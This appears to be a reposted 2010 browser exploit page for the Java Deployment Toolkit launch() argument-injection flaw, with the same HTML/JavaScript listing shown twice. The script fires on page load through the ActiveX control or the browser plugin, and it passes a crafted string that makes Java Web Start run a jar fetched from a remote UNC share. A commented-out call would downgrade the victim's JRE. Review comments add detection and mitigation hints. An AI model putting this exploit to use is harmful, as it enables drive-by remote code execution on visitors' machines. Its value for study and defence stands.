vulnerability
Java Deployment Toolkit Test Page
applicationlayer
2010. 4. 19. 11:09
<html>
<head><title>Java Deployment Toolkit Test Page</title></head>
<body>
<!--
  Test page for the Java Deployment Toolkit launch() argument handling issue
  published by Tavis Ormandy in April 2010. The inline script runs as soon as
  the page is parsed and calls launch() on the toolkit's browser component,
  so no click is involved.
  NOTE(review): the CVE id and the fixed JRE release are not stated on this
  page; take them from the vendor advisory before citing either.
-->
<script>
// Tavis Ormandy <taviso@sdf.lonestar.org>, April 2010
// Value passed to launch() where a JNLP URL is expected. Only the "http:"
// prefix looks like a URL; the rest is space-separated tokens: two "-J"
// options and a trailing "none". After JavaScript unescaping, the second
// option holds a UNC path (\\lock.cmpxchg8b.com\calc.jar), i.e. a jar on a
// remote file share rather than a local file.
// Per the advisory, the toolkit forwarded this string to the Java Web Start
// launcher with too little validation, so the embedded tokens were treated
// as launcher options instead of as part of a URL.
// Detection: a javaws/java process spawned by the browser whose command line
// contains "-J" options or a UNC path, and outbound SMB/WebDAV traffic from a
// workstation to an external host.
var u = "http: -J-jar -J\\\\lock.cmpxchg8b.com\\calc.jar none";
// Branch on the browser name string: IE reaches the toolkit through its
// ActiveX control, other browsers through a plugin MIME type.
if (window.navigator.appName == "Microsoft Internet Explorer") {
var o = document.createElement("OBJECT");
// CLSID of the Deployment Toolkit ActiveX control. This is the identifier to
// block: the mitigation published with the advisory was to set the kill bit
// for this CLSID so Internet Explorer refuses to instantiate the control.
o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
// Trigger the bug: launch() receives the crafted string unchanged.
o.launch(u);
} else {
// Mozilla
// Two OBJECT elements, one per plugin MIME type, because the type name
// differs between toolkit releases (see "Old type" / "New type" below).
var o = document.createElement("OBJECT");
var n = document.createElement("OBJECT");
o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
n.type = "application/java-deployment-toolkit";
// Both elements are attached to the document before launch() is called on
// either of them.
document.body.appendChild(o);
document.body.appendChild(n);
// Test both MIME types
// Mitigation for this path: disable or remove the Deployment Toolkit plugin
// in the browser, or deny the browser access to the plugin library, until
// the JRE is updated.
try {
// Old type
o.launch(u);
} catch (e) {
// New type
// Reached only when the call on the old-type object throws.
n.launch(u);
}
}
// Bonus Vulnerability, why not downgrade victim to a JRE vulnerable to
// this classic exploit?
// http://sunsolve.sun.com/search/document.do?assetkey=1-66-244991-1
// The call below is left commented out by the author and never runs here.
// NOTE(review): installJRE() itself is not shown on this page; the author's
// comment implies it lets page script request installation of the named
// older JRE. If so, fixing launch() alone leaves a downgrade path, and
// blocking the toolkit component covers both methods.
// o.installJRE("1.4.2_18");
</script>
</body>
</html>
<head><title>Java Deployment Toolkit Test Page</title></head>
<body>
<!--
  Listing of the Java Deployment Toolkit launch() test page (Tavis Ormandy,
  April 2010). The script calls launch() on the toolkit's browser component
  while the page is being parsed.
  NOTE(review): the CVE id and the fixed JRE release are not given here;
  confirm both against the vendor advisory.
-->
<script>
// Tavis Ormandy <taviso@sdf.lonestar.org>, April 2010
// Argument for launch(). It begins with "http:" but then carries
// space-separated tokens: "-J-jar", a second "-J" option whose value
// unescapes to the UNC path \\lock.cmpxchg8b.com\calc.jar, and "none".
// The issue is that these tokens are not rejected as an invalid URL; per the
// advisory they reached the Java Web Start launcher as options.
// Things to hunt for in telemetry: browser-spawned javaws/java processes
// with "-J" or a UNC path on the command line, and SMB/WebDAV connections
// from clients to hosts outside the organisation.
var u = "http: -J-jar -J\\\\lock.cmpxchg8b.com\\calc.jar none";
// Browser check by name string selects the ActiveX or the plugin path.
if (window.navigator.appName == "Microsoft Internet Explorer") {
var o = document.createElement("OBJECT");
// Deployment Toolkit ActiveX CLSID; setting the kill bit for this value is
// the IE-side mitigation published with the advisory.
o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
// Trigger the bug: the crafted string is passed straight to launch().
o.launch(u);
} else {
// Mozilla
// One OBJECT per plugin MIME type; which one works depends on the
// toolkit release that is installed.
var o = document.createElement("OBJECT");
var n = document.createElement("OBJECT");
o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
n.type = "application/java-deployment-toolkit";
// Attach both elements to the document before calling into them.
document.body.appendChild(o);
document.body.appendChild(n);
// Test both MIME types
// Disabling the Deployment Toolkit plugin in the browser closes this path
// until the JRE is updated.
try {
// Old type
o.launch(u);
} catch (e) {
// New type
// Fallback taken only if the old-type call throws.
n.launch(u);
}
}
// Bonus Vulnerability, why not downgrade victim to a JRE vulnerable to
// this classic exploit?
// http://sunsolve.sun.com/search/document.do?assetkey=1-66-244991-1
// Commented out by the author, so it does not execute on this page.
// NOTE(review): installJRE() is not defined in this listing; going by the
// author's comment it requests installation of the named older JRE, which
// would make downgrade a second reason to block the toolkit component.
// o.installJRE("1.4.2_18");
</script>
</body>
</html>